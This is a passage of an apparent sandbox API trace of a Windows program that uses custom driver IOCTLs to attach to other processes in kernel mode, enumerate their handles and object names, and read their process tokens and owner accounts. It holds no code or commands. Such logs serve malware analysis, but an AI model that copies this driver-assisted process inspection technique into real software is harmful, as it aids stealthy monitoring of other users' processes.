lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0245.938] PsLookupProcessByProcessId (in: ProcessId=0x208, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.938] PsAcquireProcessExitSynchronization () returned 0x0 [0245.938] KeStackAttachProcess (in: PROCESS=0xfffffa800201ea90, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800201ea90, ApcState=0xfffff880053c85d0) [0245.938] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002027c70, HandleInformation=0x0) returned 0x0 [0245.938] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.938] PsReleaseProcessExitSynchronization () returned 0x2 [0245.938] ObfDereferenceObject (Object=0xfffffa800201ea90) returned 0x12 [0245.938] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.938] ObfDereferenceObject (Object=0xfffffa8002027c70) returned 0x1 [0245.938] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.938] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.938] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.938] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x74, lpOverlapped=0x0) returned 1 [0245.939] PsLookupProcessByProcessId (in: ProcessId=0x208, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.939] PsAcquireProcessExitSynchronization () returned 0x0 [0245.939] KeStackAttachProcess (in: PROCESS=0xfffffa800201ea90, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800201ea90, ApcState=0xfffff880053c85d0) [0245.939] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80020279d0, HandleInformation=0x0) returned 0x0 [0245.939] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.939] PsReleaseProcessExitSynchronization () returned 0x2 [0245.939] ObfDereferenceObject (Object=0xfffffa800201ea90) returned 0x12 [0245.939] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.939] ObfDereferenceObject (Object=0xfffffa80020279d0) returned 0x1 [0245.939] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.939] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.939] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.939] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.939] PsLookupProcessByProcessId (in: ProcessId=0x208, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.939] PsAcquireProcessExitSynchronization () returned 0x0 [0245.939] KeStackAttachProcess (in: PROCESS=0xfffffa800201ea90, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800201ea90, ApcState=0xfffff880053c85d0) [0245.939] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0245.939] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.939] PsReleaseProcessExitSynchronization () returned 0x2 [0245.939] ObfDereferenceObject (Object=0xfffffa800201ea90) returned 0x12 [0245.939] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.939] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0245.939] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.939] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.939] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d4) returned 0xc8 [0245.940] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0245.940] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa8002038b30, HandleInformation=0x0) returned 0x0 [0245.940] ObOpenObjectByPointer (in: Object=0xfffffa8002038b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff80000664) returned 0x0 [0245.940] ObfDereferenceObject (Object=0xfffffa8002038b30) returned 0x14 [0245.940] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000664, DesiredAccess=0x8, TokenHandle=0xfffffa8002fec1c0 | out: TokenHandle=0xfffffa8002fec1c0*=0xc4) returned 0x0 [0245.940] ZwClose (Handle=0xffffffff80000664) returned 0x0 [0245.940] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.940] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0245.940] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0245.942] CloseHandle (hObject=0xc4) returned 1 [0245.942] CloseHandle (hObject=0xc8) returned 1 [0245.942] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.942] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0245.942] PsLookupProcessByProcessId (in: ProcessId=0x5d4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.942] PsAcquireProcessExitSynchronization () returned 0x0 [0245.942] KeStackAttachProcess (in: PROCESS=0xfffffa8002038b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002038b30, ApcState=0xfffff880053c85d0) [0245.942] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800203ddd0, HandleInformation=0x0) returned 0x0 [0245.942] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.942] PsReleaseProcessExitSynchronization () returned 0x2 [0245.942] ObfDereferenceObject (Object=0xfffffa8002038b30) returned 0x12 [0245.942] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003076044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003076044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.942] ObfDereferenceObject (Object=0xfffffa800203ddd0) returned 0x1 [0245.942] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.942] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.942] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.942] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x92, lpOverlapped=0x0) returned 1 [0245.942] PsLookupProcessByProcessId (in: ProcessId=0x5d4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.942] PsAcquireProcessExitSynchronization () returned 0x0 [0245.942] KeStackAttachProcess (in: PROCESS=0xfffffa8002038b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002038b30, ApcState=0xfffff880053c85d0) [0245.942] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800203d9d0, HandleInformation=0x0) returned 0x0 [0245.943] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.943] PsReleaseProcessExitSynchronization () returned 0x2 [0245.943] ObfDereferenceObject (Object=0xfffffa8002038b30) returned 0x12 [0245.943] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003077044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003077044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.943] ObfDereferenceObject (Object=0xfffffa800203d9d0) returned 0x1 [0245.943] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.943] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.943] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.943] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.943] PsLookupProcessByProcessId (in: ProcessId=0x5d4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.943] PsAcquireProcessExitSynchronization () returned 0x0 [0245.943] KeStackAttachProcess (in: PROCESS=0xfffffa8002038b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002038b30, ApcState=0xfffff880053c85d0) [0245.943] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0245.943] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.943] PsReleaseProcessExitSynchronization () returned 0x2 [0245.943] ObfDereferenceObject (Object=0xfffffa8002038b30) returned 0x12 [0245.943] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003078044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003078044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.943] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0245.943] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.943] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.943] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0xc8 [0245.943] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0245.943] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa8002046060, HandleInformation=0x0) returned 0x0 [0245.943] ObOpenObjectByPointer (in: Object=0xfffffa8002046060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff80000664) returned 0x0 [0245.944] ObfDereferenceObject (Object=0xfffffa8002046060) returned 0x14 [0245.944] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000664, DesiredAccess=0x8, TokenHandle=0xfffffa8002fec1c0 | out: TokenHandle=0xfffffa8002fec1c0*=0xc4) returned 0x0 [0245.944] ZwClose (Handle=0xffffffff80000664) returned 0x0 [0245.944] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.944] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0245.944] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0245.946] CloseHandle (hObject=0xc4) returned 1 [0245.946] CloseHandle (hObject=0xc8) returned 1 [0245.946] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.946] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0245.946] PsLookupProcessByProcessId (in: ProcessId=0x36c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.946] PsAcquireProcessExitSynchronization () returned 0x0 [0245.946] KeStackAttachProcess (in: PROCESS=0xfffffa8002046060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002046060, ApcState=0xfffff880053c85d0) [0245.946] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800204c810, HandleInformation=0x0) returned 0x0 [0245.946] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.946] PsReleaseProcessExitSynchronization () returned 0x2 [0245.946] ObfDereferenceObject (Object=0xfffffa8002046060) returned 0x12 [0245.946] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003079044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003079044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.946] ObfDereferenceObject (Object=0xfffffa800204c810) returned 0x1 [0245.946] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.946] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.946] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.946] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x76, lpOverlapped=0x0) returned 1 [0245.946] PsLookupProcessByProcessId (in: ProcessId=0x36c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.946] PsAcquireProcessExitSynchronization () returned 0x0 [0245.946] KeStackAttachProcess (in: PROCESS=0xfffffa8002046060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002046060, ApcState=0xfffff880053c85d0) [0245.947] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80020507e0, HandleInformation=0x0) returned 0x0 [0245.947] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.947] PsReleaseProcessExitSynchronization () returned 0x2 [0245.947] ObfDereferenceObject (Object=0xfffffa8002046060) returned 0x12 [0245.947] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307a044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800307a044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.947] ObfDereferenceObject (Object=0xfffffa80020507e0) returned 0x1 [0245.947] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.947] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.947] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.947] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.947] PsLookupProcessByProcessId (in: ProcessId=0x36c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.947] PsAcquireProcessExitSynchronization () returned 0x0 [0245.947] KeStackAttachProcess (in: PROCESS=0xfffffa8002046060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002046060, ApcState=0xfffff880053c85d0) [0245.947] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0245.947] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.947] PsReleaseProcessExitSynchronization () returned 0x2 [0245.948] ObfDereferenceObject (Object=0xfffffa8002046060) returned 0x12 [0245.948] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa800307b044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307b044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.948] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0245.948] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.948] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x51c) returned 0xc8 [0245.948] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0245.948] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa800205e5f0, HandleInformation=0x0) returned 0x0 [0245.948] ObOpenObjectByPointer (in: Object=0xfffffa800205e5f0, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff80000664) returned 0x0 [0245.948] ObfDereferenceObject (Object=0xfffffa800205e5f0) returned 0x14 [0245.948] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000664, DesiredAccess=0x8, TokenHandle=0xfffffa8002fec1c0 | out: TokenHandle=0xfffffa8002fec1c0*=0xc4) returned 0x0 [0245.948] ZwClose (Handle=0xffffffff80000664) returned 0x0 [0245.948] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.948] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0245.948] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0245.950] CloseHandle (hObject=0xc4) returned 1 [0245.950] CloseHandle (hObject=0xc8) returned 1 [0245.950] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.950] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0245.950] PsLookupProcessByProcessId (in: ProcessId=0x51c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.950] PsAcquireProcessExitSynchronization () returned 0x0 [0245.950] KeStackAttachProcess (in: PROCESS=0xfffffa800205e5f0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800205e5f0, ApcState=0xfffff880053c85d0) [0245.950] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002063f20, HandleInformation=0x0) returned 0x0 [0245.950] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.950] PsReleaseProcessExitSynchronization () returned 0x2 [0245.950] ObfDereferenceObject (Object=0xfffffa800205e5f0) returned 0x12 [0245.951] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003083044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003083044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.951] ObfDereferenceObject (Object=0xfffffa8002063f20) returned 0x1 [0245.951] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.951] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.951] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.951] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x80, lpOverlapped=0x0) returned 1 [0245.951] PsLookupProcessByProcessId (in: ProcessId=0x51c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.951] PsAcquireProcessExitSynchronization () returned 0x0 [0245.951] KeStackAttachProcess (in: PROCESS=0xfffffa800205e5f0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800205e5f0, ApcState=0xfffff880053c85d0) [0245.951] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002063990, HandleInformation=0x0) returned 0x0 [0245.951] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.951] PsReleaseProcessExitSynchronization () returned 0x2 [0245.951] ObfDereferenceObject (Object=0xfffffa800205e5f0) returned 0x12 [0245.951] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003084044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003084044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.951] ObfDereferenceObject (Object=0xfffffa8002063990) returned 0x1 [0245.951] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.951] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.951] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.951] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.951] PsLookupProcessByProcessId (in: ProcessId=0x51c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.951] PsAcquireProcessExitSynchronization () returned 0x0 [0245.951] KeStackAttachProcess (in: PROCESS=0xfffffa800205e5f0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800205e5f0, ApcState=0xfffff880053c85d0) [0245.952] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: 